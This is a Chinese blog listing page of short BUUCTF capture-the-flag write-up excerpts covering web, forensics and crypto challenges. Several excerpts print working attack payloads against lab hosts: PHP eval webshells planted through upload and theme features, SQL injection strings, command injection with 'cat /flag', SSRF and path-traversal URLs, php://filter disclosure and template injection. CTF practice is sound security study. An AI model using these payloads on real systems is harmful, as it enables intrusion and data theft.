自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(25)
  • 收藏
  • 关注

原创 BUUCTF刷题记录 Easy MD5

[BJDCTF2020]Easy MD5进入网址输入ffifdyop,抓包发现(’./levels91.php’)进入再抓包发现然后构造/levels91.php?a[]=1&b[]=2抓包发现(’./levell14.php’)进入最后得flag

2020-06-02 16:54:42 298

原创 BUUCTF刷题记录 Harley Quinn

[GKCTF2020]Harley Quinn下载发现一张图片一个wavwav用Audacity打开听完发现最后有拨号音DTMF解得#222833344477773338866#根据hint九键输出 ctfisfun下载FreeFileCamouflage输入图片地址 密钥 然后De-Camouflage!得flag.txt...

2020-06-01 11:51:50 483

原创 BUUCTF刷题记录 LSB

LSB下载打开使用stegsolve把图片放进去

2020-05-29 20:03:52 4293

原创 BUUCTF刷题记录 cve版签到

[GKCTF2020]cve版签到进入网页传入/?url=http://127.0.0.1%00.ctfhub.com发现[4] => Tips: Host must be end with ‘123’把传入的改为?url=http://127.0.0.123%00.ctfhub.com得flag

2020-05-28 13:51:55 374

原创 BUUCTF刷题记录 老八小超市儿

[GKCTF2020]老八小超市儿进入网址admin.php进入后台账号admin密码shopxo应用中心——应用商城——主题下载默认主题编写一个a.php文件放进默认主题a.php文件内容<?php @eval($_POST[a]); phpinfo(); ?>测试成功性http://771c3e8f-4cea-4775-be69-fce5b8bd52f2.node3.buuoj.cn/public/static/index/default/a.ph

2020-05-28 11:59:44 488

原创 BUUCTF刷题记录 Check_1n

[GKCTF2020]Check_1n进入程序用IDA搜索字符串View-Open subviews-Strings(视图-打开子视图-字符串)找到开机密码 HelloWorld用上下左右控制里面的上下左右,空格键控制确认, 切换到打砖块程序,将光标控制至里面的回车键,用空格键确认得flag...

2020-05-27 17:17:50 398

原创 BUUCTF刷题记录 wireshark

wireshark下载用wireshark软件打开找到这条得flag

2020-05-25 15:18:11 1793

原创 BUUCTF刷题记录 Pokémon

[GKCTF2020]Pokémon下载安装包 进入游戏来到天元镇接着做任务 经过101道路 道吉镇 到103道路 发现flag

2020-05-24 13:06:37 551

原创 BUUCTF刷题记录 小学生的密码学

[GKCTF2020]小学生的密码学仿射密码的代码实现 破解代码#include <iostream>#include<math.h>#include<string.h>using namespace std;//模的取逆int dx, y, q;void extend_Eulid(int aa, int bb){ if (bb == 0) { dx = 1; y = 0; q = aa; } else { extend_Eulid(b

2020-05-24 13:00:22 1717 3

原创 BUUCTF刷题记录 Easy Java

[RoarCTF 2019]Easy Java进入网址使用burpsuite抓包点击help 抓包把GET改为POST 传入filename值为WEB-INF/web.xml发现com.Wm.ctf.FlagController然后构造payload:filename=WEB-INF/classes/com/wm/ctf/FlagController.classbase64解码得flag...

2020-05-20 08:56:05 278

原创 BUUCTF刷题记录 Upload

[极客大挑战 2019]Upload进入页面选择文件上传 此处上传木马 木马内容为GIF89a<script language="php">eval($_POST['flag']);</script> 做一个phtml的文件

2020-05-19 10:41:40 480

原创 BUUCTF刷题记录 NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei进入网址源码分析if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))用data伪协议传参?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=源码分析if(preg_match("/flag/",$file)){ echo "Not now!";

2020-05-18 19:32:43 445

原创 BUUCTF刷题记录 Http

[极客大挑战 2019]Http进入网址查看源代码发现Secret.php进入用burpsuite试试发现It doesn’t come from 'https://www.Sycsecret.com添加referer:https://www.Sycsecret.com又发现Please use “Syclover” browser添加User-Agent:Syclover browser紧接着发现No!!! you can only read this locally!!!再添加

2020-05-18 16:10:10 803

原创 BUUUCTF刷题记录 Fakebook

[网鼎杯 2018]Fakebook进入页面查表view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#查列view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(column_name)

2020-05-17 09:16:29 278

原创 BUUCTF做题笔记 easy_tornado

[护网杯 2018]easy_tornado进入页面分别查看模板注入/error?msg={{1*2}}测试过滤payload:error?msg={{handler.settings}}得cookie_secret用PHP解码最后payload:/file?filename=/fllllllllllllag&filehash=e9bebc8c9f90af297419119189d8a9e4进入得flag...

2020-05-16 19:23:34 254

原创 BUUCTF刷题记录 Ping Ping Ping

[GXYCTF2019]Ping Ping Ping进入页面然后/?ip=127.0.0.1|ls进入读取flag.php再cat$IFS$1indnx.php再变量拼接?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php转至http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php再F12...

2020-05-16 18:55:32 1829

原创 BUUCTF刷题笔记 EasySQL 极客大挑战2019

[极客大挑战 2019]EasySQL进入网页使用万能密码admin’ or 1=1 #登入得flag

2020-05-14 14:55:29 168

原创 BUUCTF刷题笔记 Include

[ACTF2020 新生赛]Include进入网址http://ea90edbb-9604-451e-91d3-101f65554fee.node3.buuoj.cn/?file=flag.php使用 “php://filter"伪协议” 来进行包含构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php进入http://ea90edbb-9604-451e-91d3-101f65554fee.n

2020-05-14 14:45:01 388

原创 BUUCTF刷题笔记 BuyFlag

[极客大挑战 2019]BuyFlag进入页面点击menu,进到payflag页面,查看源代码发现<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password ==

2020-05-12 08:51:30 706

原创 BUUCTF刷题笔记 Secret File

[极客大挑战 2019]Secret File进入网页 查看源代码发现 /Archive_room.php进入 http://b113d9ac-3e92-40b5-ac49-585d56e600fc.node3.buuoj.cn/Archive_room.php点击STCRET会发现跳转 啥都没有这时候就要用到burp suite抓包发现<!DOCTYPE html><html><!-- secr3t.php --

2020-05-12 08:28:48 433

原创 BUUCTF刷题记录 Havefun

[极客大挑战 2019]Havefun进入页面查看页面源代码,在最后发现<!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } -->传参 cat=doghttp://dd2a9fa5-398c-4dbb-91c9-399f408b73da.node3.buuoj.cn/

2020-05-11 17:31:18 134

原创 BUUCTF做题笔记 Knife

[极客大挑战 2019]Knife进入页面使用中国蚁剑连接URL地址 http://4494b277-e30d-40a0-abdf-423e44f664fe.node3.buuoj.cn/?Knife.php密码 Syc添加;连接 ;打开文件管理找到flag

2020-05-11 17:17:52 816

原创 BUUCTF刷题记录 Exec

[ACTF2020 新生赛]Exec进入页面首先 127.0.0.1;ls 进行目录读取,然后 127.0.0.1;cat /flag得flag

2020-05-11 16:54:37 421

转载 BUUCTF刷题记录 随便注

[强网杯 2019]随便注

2020-05-11 10:26:05 202

原创 BUUCTF解题记录 WarmUp

BUUCTF解题记录[HCTF 2018]WarmUp**发现source.php 访问发现hint.php`构造获取flag的语句详细参考https://www.cnblogs.com/xhds/p/12266072.html最终payload:http://dd6ac72f-565f-4e02-8778-a2930b07c833.node3.buuoj.cn/index.php?file=hint.php?../../../../../ffffllllaaaagggg获取flag参考

2020-05-11 10:19:52 463

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除